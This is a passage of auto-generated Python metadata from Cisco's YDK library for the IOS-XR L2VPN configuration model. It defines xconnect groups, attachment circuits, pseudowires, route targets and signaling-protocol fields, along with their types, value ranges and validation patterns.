_MetaInfoClassMember('attachment-circuit', REFERENCE_LIST, 'AttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit',
[], [],
''' Attachment circuit interface
''',
'attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 38)], [],
''' Name of the point to point xconnect
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('attachment-circuits', REFERENCE_CLASS, 'AttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits',
[], [],
''' List of attachment circuits
''',
'attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('backup-attachment-circuits', REFERENCE_CLASS, 'BackupAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits',
[], [],
''' List of backup attachment circuits
''',
'backup_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interworking', REFERENCE_ENUM_CLASS, 'InterworkingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterworkingEnum',
[], [],
''' Interworking
''',
'interworking',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('monitor-sessions', REFERENCE_CLASS, 'MonitorSessions' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions',
[], [],
''' List of Monitor session segments
''',
'monitor_sessions',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('p2p-description', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' cross connect description Name
''',
'p2p_description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-evpns', REFERENCE_CLASS, 'PseudowireEvpns' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns',
[], [],
''' List of EVPN Services
''',
'pseudowire_evpns',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-routeds', REFERENCE_CLASS, 'PseudowireRouteds' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds',
[], [],
''' List of pseudowire-routed
''',
'pseudowire_routeds',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowires', REFERENCE_CLASS, 'Pseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires',
[], [],
''' List of pseudowires
''',
'pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'p2p-xconnect',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects',
False,
[
_MetaInfoClassMember('p2p-xconnect', REFERENCE_LIST, 'P2PXconnect' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect',
[], [],
''' Point to point xconnect
''',
'p2p_xconnect',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'p2p-xconnects',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router distinguisher type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy',
False,
[
_MetaInfoClassMember('export', ATTRIBUTE, 'str' , None, None,
[], [],
''' Export route policy
''',
'export',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('import', ATTRIBUTE, 'str' , None, None,
[], [],
''' Import route policy
''',
'import_',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-route-policy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs',
False,
[
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'two-byte-as-or-four-byte-as',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ipv4-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget',
False,
[
_MetaInfoClassMember('format', REFERENCE_ENUM_CLASS, 'BgpRouteTargetFormatEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetFormatEnum',
[], [],
''' Format of the route target
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'BgpRouteTargetRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetRoleEnum',
[], [],
''' Role of the router target type
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ipv4-address', REFERENCE_LIST, 'Ipv4Address' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address',
[], [],
''' ipv4 address
''',
'ipv4_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('two-byte-as-or-four-byte-as', REFERENCE_LIST, 'TwoByteAsOrFourByteAs' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs',
[], [],
''' two byte as or four byte as
''',
'two_byte_as_or_four_byte_as',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-route-target',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets',
False,
[
_MetaInfoClassMember('mp2mp-route-target', REFERENCE_LIST, 'Mp2MpRouteTarget' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget',
[], [],
''' Name of the Route Target
''',
'mp2mp_route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-route-targets',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' The name of the Attachment Circuit
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('remote-ce-id', ATTRIBUTE, 'int' , None, None,
[('1', '16384')], [],
''' Remote Customer Edge Identifier
''',
'remote_ce_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'remote-ceid-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits',
False,
[
_MetaInfoClassMember('remote-ceid-attachment-circuit', REFERENCE_LIST, 'RemoteCeidAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit',
[], [],
''' AC And Remote Customer Edge Identifier
''',
'remote_ceid_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'remote-ceid-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid',
False,
[
_MetaInfoClassMember('ce-id', ATTRIBUTE, 'int' , None, None,
[('1', '16384')], [],
''' Local Customer Edge Identifier
''',
'ce_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('remote-ceid-attachment-circuits', REFERENCE_CLASS, 'RemoteCeidAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits',
[], [],
''' AC And Remote Customer Edge Identifier
Table
''',
'remote_ceid_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ceid',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids',
False,
[
_MetaInfoClassMember('ceid', REFERENCE_LIST, 'Ceid' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid',
[], [],
''' Local Customer Edge Identifier
''',
'ceid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ceids',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol',
False,
[
_MetaInfoClassMember('ce-range', ATTRIBUTE, 'int' , None, None,
[('11', '100')], [],
''' Local Customer Edge Identifier
''',
'ce_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ceids', REFERENCE_CLASS, 'Ceids' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids',
[], [],
''' Local Customer Edge Identifier Table
''',
'ceids',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable signaling protocol
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable auto-discovery
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-route-policy', REFERENCE_CLASS, 'Mp2MpRoutePolicy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy',
[], [],
''' Route policy
''',
'mp2mp_route_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-route-targets', REFERENCE_CLASS, 'Mp2MpRouteTargets' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets',
[], [],
''' Route Target
''',
'mp2mp_route_targets',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-signaling-protocol', REFERENCE_CLASS, 'Mp2MpSignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol',
[], [],
''' signaling protocol in this MP2MP
''',
'mp2mp_signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('route-distinguisher', REFERENCE_CLASS, 'RouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 26)], [],
''' Name of the multi point to multi point
xconnect
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('mp2mp-auto-discovery', REFERENCE_CLASS, 'Mp2MpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery',
[], [],
''' auto-discovery in this MP2MP
''',
'mp2mp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-control-word', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable control word
''',
'mp2mp_control_word',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-interworking', REFERENCE_ENUM_CLASS, 'InterworkingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterworkingEnum',
[], [],
''' Interworking
''',
'mp2mp_interworking',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' shutdown this MP2MP VPWS instance
''',
'mp2mp_shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mpl2-encapsulation', REFERENCE_ENUM_CLASS, 'L2EncapsulationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2EncapsulationEnum',
[], [],
''' Configure Layer 2 Encapsulation
''',
'mp2mpl2_encapsulation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mpmtu', ATTRIBUTE, 'int' , None, None,
[('64', '65535')], [],
''' Maximum transmission unit for this MP2MP
VPWS instance
''',
'mp2mpmtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mpvpn-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' VPN Identifier
''',
'mp2mpvpn_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-xconnect',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects',
False,
[
_MetaInfoClassMember('mp2mp-xconnect', REFERENCE_LIST, 'Mp2MpXconnect' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect',
[], [],
''' Multi point to multi point xconnect
''',
'mp2mp_xconnect',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-xconnects',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the xconnect group
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('mp2mp-xconnects', REFERENCE_CLASS, 'Mp2MpXconnects' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects',
[], [],
''' List of multi point to multi point xconnects
''',
'mp2mp_xconnects',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('p2p-xconnects', REFERENCE_CLASS, 'P2PXconnects' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects',
[], [],
''' List of point to point xconnects
''',
'p2p_xconnects',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'xconnect-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups',
False,
[
_MetaInfoClassMember('xconnect-group', REFERENCE_LIST, 'XconnectGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup',
[], [],
''' Xconnect group
''',
'xconnect_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'xconnect-groups',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
